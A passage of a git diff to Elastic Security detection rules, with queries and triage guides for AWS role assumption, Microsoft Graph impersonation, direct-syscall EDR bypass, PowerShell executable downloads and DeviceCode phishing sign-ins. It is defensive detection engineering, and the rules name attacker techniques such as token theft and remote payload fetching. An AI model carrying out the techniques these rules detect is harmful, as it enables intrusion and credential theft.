Sessions**: If the role assumption is deemed unauthorized, revoke the session by modifying IAM policies or the permissions associated with the assumed role.\n- **Strengthen Monitoring and Alerts**: Implement additional monitoring for specific high-risk roles, especially those with elevated permissions.\n- **Regularly Manage Exceptions**: Regularly review high-volume roles and user agent patterns to refine alerts, minimizing noise by adding trusted patterns as exceptions.\n- **Incident Response**: If confirmed as malicious, follow incident response protocols for containment, investigation, and remediation.\n\n### Additional Information\n\nFor more details on managing and securing AWS STS in your environment, refer to the [AWS STS documentation](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html).\n", - "query": "event.dataset: \"aws.cloudtrail\"\n and event.provider: \"sts.amazonaws.com\"\n and event.action: \"AssumeRole\"\n and event.outcome: \"success\"\n and aws.cloudtrail.user_identity.type: (\"AssumedRole\" or \"IAMUser\")\n", - "references": [ - "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "aws.cloudtrail.user_identity.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "288a198e-9b9b-11ef-a0a8-f661ea17fbcd", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS STS", - "Resources: Investigation Guide", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1548", - "name": "Abuse Elevation Control Mechanism", - "reference": "https://attack.mitre.org/techniques/T1548/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1550", - "name": "Use Alternate Authentication Material", - "reference": "https://attack.mitre.org/techniques/T1550/", - "subtechnique": [ - { - "id": "T1550.001", - "name": "Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1550/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 4 - }, - "id": "288a198e-9b9b-11ef-a0a8-f661ea17fbcd_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_6.json b/packages/security_detection_engine/kibana/security_rule/2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_6.json new file mode 100644 index 00000000000..aa29fc5653e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_6.json @@ -0,0 +1,135 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user.", + "false_positives": [ + "Users legitimately accessing Microsoft Graph API using the specified client application ID and tenant ID. This may include authorized applications or services that interact with Microsoft Graph on behalf of users.", + "Authorized third-party applications or services that use the specified client application ID to access Microsoft Graph API resources for legitimate purposes.", + "Administrative or automated tasks that involve accessing Microsoft Graph API using the specified client application ID and tenant ID, such as provisioning or managing resources." + ], + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-azure.graphactivitylogs-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Graph Request User Impersonation by Unusual Client", + "new_terms_fields": [ + "azure.graphactivitylogs.properties.app_id", + "azure.graphactivitylogs.properties.user_principal_object_id" + ], + "note": "## Triage and analysis\n\n### Investigating Microsoft Graph Request User Impersonation by Unusual Client\n\nThis rule detects the first observed occurrence of a Microsoft Graph API request by a specific client application ID (`azure.graphactivitylogs.properties.app_id`) in combination with a user principal object ID (`azure.graphactivitylogs.properties.user_principal_object_id`) and tenant ID (`azure.tenant_id`) within specific number of days. This may indicate unauthorized access following a successful phishing attempt, token theft, or abuse of OAuth workflows.\n\nAdversaries frequently exploit legitimate Microsoft or third-party application IDs to avoid raising suspicion during initial access. By using pre-consented or trusted apps to interact with Microsoft Graph, attackers can perform actions on behalf of users without triggering conventional authentication alerts or requiring additional user interaction.\n\n### Possible investigation steps\n\n- Review `azure.graphactivitylogs.properties.user_principal_object_id` and correlate with recent sign-in logs for the associated user.\n- Determine whether `azure.graphactivitylogs.properties.app_id` is a known and approved application in your environment.\n- Investigate the `user_agent.original` field for signs of scripted access (e.g., automation tools or libraries).\n- Check the source IP address (`source.ip`) and geolocation data (`source.geo.*`) for unfamiliar origins.\n- Inspect `azure.graphactivitylogs.properties.scopes` to understand the level of access being requested by the app.\n- Examine any follow-up Graph API activity from the same `app_id` or `user_principal_object_id` for signs of data access or exfiltration.\n- Correlate with device or session ID fields (`azure.graphactivitylogs.properties.c_sid`, if present) to detect persistent or repeat activity.\n\n### False positive analysis\n\n- First-time use of a legitimate Microsoft or enterprise-approved application.\n- Developer or automation workflows initiating new Graph API requests.\n- Valid end-user activity following device reconfiguration or new client installation.\n- Maintain an allowlist of expected `app_id` values and known developer tools.\n- Suppress detections from known good `user_agent.original` strings or approved source IP ranges.\n- Use device and identity telemetry to distinguish trusted vs. unknown activity sources.\n- Combine with session risk or sign-in anomaly signals where available.\n\n### Response and remediation\n\n- Reach out to the user and verify whether they authorized the application access.\n- Revoke active OAuth tokens and reset credentials if unauthorized use is confirmed.\n- Search for additional Graph API calls made by the same `app_id` or `user_principal_object_id`.\n- Investigate whether sensitive resources (mail, files, Teams, contacts) were accessed.\n- Apply Conditional Access policies to limit Graph API access by app type, IP, or device state.\n- Restrict user consent for third-party apps and enforce admin approval workflows.\n- Monitor usage of new or uncommon `app_id` values across your tenant.\n- Provide user education on OAuth phishing tactics and reporting suspicious prompts.\n", + "query": "event.dataset: \"azure.graphactivitylogs\"\n and event.type: \"access\"\n and azure.graphactivitylogs.properties.app_id: *\n and azure.graphactivitylogs.properties.c_idtyp: \"user\"\n and azure.graphactivitylogs.properties.client_auth_method: 0\n and http.response.status_code: 200\n and url.domain: \"graph.microsoft.com\"\n and not url.path: (\n /v1.0/organization\n or /v1.0/me/licenseDetails\n or /v1.0/me/photo*\n or /v1.0/me/photos*\n or /beta/me/settings/regionalAndLanguageSettings\n or /v1.0/me/drive/special/copilotuploads\n or /v1.0/me/informationProtection/sensitivityLabels\n or /beta/me/informationProtection/dataLossPreventionPolicies\n )\n", + "references": [ + "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/", + "https://pushsecurity.com/blog/consentfix" + ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.app_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.c_idtyp", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.client_auth_method", + "type": "integer" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "http.response.status_code", + "type": "long" + }, + { + "ecs": true, + "name": "url.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "url.path", + "type": "wildcard" + } + ], + "risk_score": 21, + "rule_id": "2a3f38a8-204e-11f0-9c1f-f661ea17fbcd", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft Graph", + "Data Source: Microsoft Graph Activity Logs", + "Resources: Investigation Guide", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1528", + "name": "Steal Application Access Token", + "reference": "https://attack.mitre.org/techniques/T1528/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 6 + }, + "id": "2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_315.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_315.json new file mode 100644 index 00000000000..331b98fab72 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_315.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious process access events from an unknown memory region. Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Process Access via Direct System Call", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\sysfer.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\",\n \"?:\\\\ProgramData\\\\Symantec\\\\Symantec Endpoint Protection\\\\*\\\\sysfer.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "references": [ + "https://twitter.com/SBousseaden/status/1278013896440324096", + "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 315 + }, + "id": "2dd480be-1263-4d9c-8672-172928f6789a_315", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_115.json b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_115.json new file mode 100644 index 00000000000..305d98d0919 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_115.json @@ -0,0 +1,135 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies powershell.exe being used to download an executable file from an untrusted remote destination.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.network-*", + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/current/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id with maxspan=30s\n[network where host.os.type == \"windows\" and \n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n network.protocol == \"dns\" and\n not dns.question.name : (\n \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\", \"*.windowsupdate.com\",\n \"metadata.google.internal\", \"dist.nuget.org\", \"artifacts.elastic.co\", \"*.digicert.com\",\n \"*.chocolatey.org\", \"outlook.office365.com\", \"cdn.oneget.org\", \"ci.dot.net\",\n \"packages.icinga.com\", \"login.microsoftonline.com\", \"*.gov\", \"*.azure.com\", \"*.python.org\",\n \"dl.google.com\", \"sensor.cloud.tenable.com\", \"*.azurefd.net\", \"*.office.net\", \"*.anac*\",\n \"aka.ms\", \"dot.net\", \"*.visualstudio.com\", \"*.local\") and\n not user.id == \"S-1-5-18\" and\n /* Filter out NetBIOS/LLMNR-style names (e.g. host, localhost, etc.) */\n dns.question.name regex \"\"\".*\\.[a-zA-Z]{2,5}\"\"\"]\n[file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : \"powershell.exe\" and \n (file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\", \"cmd\", \"vbs\", \"vbe\", \"js\", \"jse\", \"wsh\", \"wsf\", \"sct\", \"hta\", \"cpl\", \"scr\", \"pif\", \"com\") or file.Ext.header_bytes : \"4d5a*\") and\n not file.name : \"__PSScriptPolicy*.ps1\" and\n not file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\????????.dll\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*\\\\????????.dll\",\n \"?:\\\\Windows\\\\TEMP\\\\ansible-tmp-*\\\\AnsiballZ*.ps1\"\n ) and\n not user.id == \"S-1-5-18\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "33f306e8-417c-411b-965c-c2812d6d3f4d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 115 + }, + "id": "33f306e8-417c-411b-965c-c2812d6d3f4d_115", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3db029b3-fbb7-4697-ad07-33cbfd5bd080_1.json b/packages/security_detection_engine/kibana/security_rule/3db029b3-fbb7-4697-ad07-33cbfd5bd080_1.json deleted file mode 100644 index bf9bf60569e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/3db029b3-fbb7-4697-ad07-33cbfd5bd080_1.json +++ /dev/null @@ -1,176 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies concurrent Entra ID sign-in events for the same user and session from multiple sources, and where one of the authentication event has some suspicious properties often associated to DeviceCode and OAuth phishing. Adversaries may steal Refresh Tokens (RTs) via phishing to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources.", - "false_positives": [ - "Users authenticating from multiple devices and using the deviceCode protocol or the Visual Studio Code client." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Suspicious Microsoft Entra ID Concurrent Sign-Ins via DeviceCode", - "note": "## Triage and analysis\n\n### Investigating Suspicious Microsoft Entra ID Concurrent Sign-Ins via DeviceCode\n\n### Possible investigation steps\n\n- Review the sign-in logs to assess the context and reputation of the source.ip address.\n- Investigate the user account associated with the successful sign-in to determine if the activity aligns with expected behavior or if it appears suspicious.\n- Check for any recent changes or anomalies in the user's account settings or permissions that could indicate compromise.\n- Review the history of sign-ins for the user to identify any patterns or unusual access times that could suggest unauthorized access.\n- Assess the device from which the sign-in was attempted to ensure it is a recognized and authorized device for the user.\n\n### Response and remediation\n\n- Immediately revoke the compromised Primary Refresh Tokens (PRTs) to prevent further unauthorized access. This can be done through the Azure portal by navigating to the user's account and invalidating all active sessions.\n- Enforce a password reset for the affected user accounts to ensure that any credentials potentially compromised during the attack are no longer valid.\n- Implement additional Conditional Access policies that require device compliance checks and restrict access to trusted locations or devices only, to mitigate the risk of future PRT abuse.\n- Conduct a thorough review of the affected accounts' recent activity logs to identify any unauthorized actions or data access that may have occurred during the compromise.\n- Escalate the incident to the security operations team for further investigation and to determine if there are any broader implications or additional compromised accounts.\n- Enhance monitoring by configuring alerts for unusual sign-in patterns or device code authentication attempts from unexpected locations or devices, to improve early detection of similar threats.\n- Coordinate with the incident response team to perform a post-incident analysis and update the incident response plan with lessons learned from this event.", - "query": "from logs-azure.signinlogs-* metadata _id, _version, _index\n\n| where event.category == \"authentication\" and event.dataset == \"azure.signinlogs\" and\n azure.signinlogs.properties.original_transfer_method == \"deviceCodeFlow\"\n\n| Eval Esql.interactive_logon = CASE(azure.signinlogs.category == \"SignInLogs\", source.ip, null),\n Esql.non_interactive_logon = CASE(azure.signinlogs.category == \"NonInteractiveUserSignInLogs\", source.ip, null)\n\n| stats Esql.count_logon = count(*),\n Esql.timestamp_values = values(@timestamp),\n Esql.source_ip_count_distinct = count_distinct(source.ip),\n Esql.is_interactive = count(Esql.interactive_logon),\n Esql.is_non_interactive = count(Esql.non_interactive_logon),\n Esql.user_agent_count_distinct = COUNT_DISTINCT(user_agent.original),\n Esql.user_agent_values = VALUES(user_agent.original),\n Esql.azure_signinlogs_properties_client_app_values = values(azure.signinlogs.properties.app_display_name),\n Esql.azure_signinlogs_properties_client_app_values = 